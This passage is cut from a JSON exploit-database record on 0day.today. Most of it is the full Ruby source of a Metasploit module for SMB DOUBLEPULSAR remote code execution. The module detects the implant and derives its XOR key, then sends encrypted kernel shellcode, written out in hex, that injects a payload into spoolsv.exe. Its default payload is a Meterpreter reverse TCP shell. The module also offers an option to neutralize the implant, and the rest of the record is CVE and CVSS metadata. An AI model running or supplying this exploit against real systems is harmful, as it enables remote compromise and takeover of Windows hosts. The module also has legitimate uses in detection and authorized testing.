["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}], "modified": "2021-10-21T22:27:03", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-21T22:27:03", "rev": 2}}, 
"objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 
'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-23] #"}, "lastseen": "2021-10-23T14:17:45", "differentElements": ["sourceData"], "edition": 52}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "182838d7f999efd7b6de5cf5ad62c3a6", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-23T22:13:27", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": 
"zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96704", "SMNTC-96709", "SMNTC-96705", "SMNTC-96703", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": 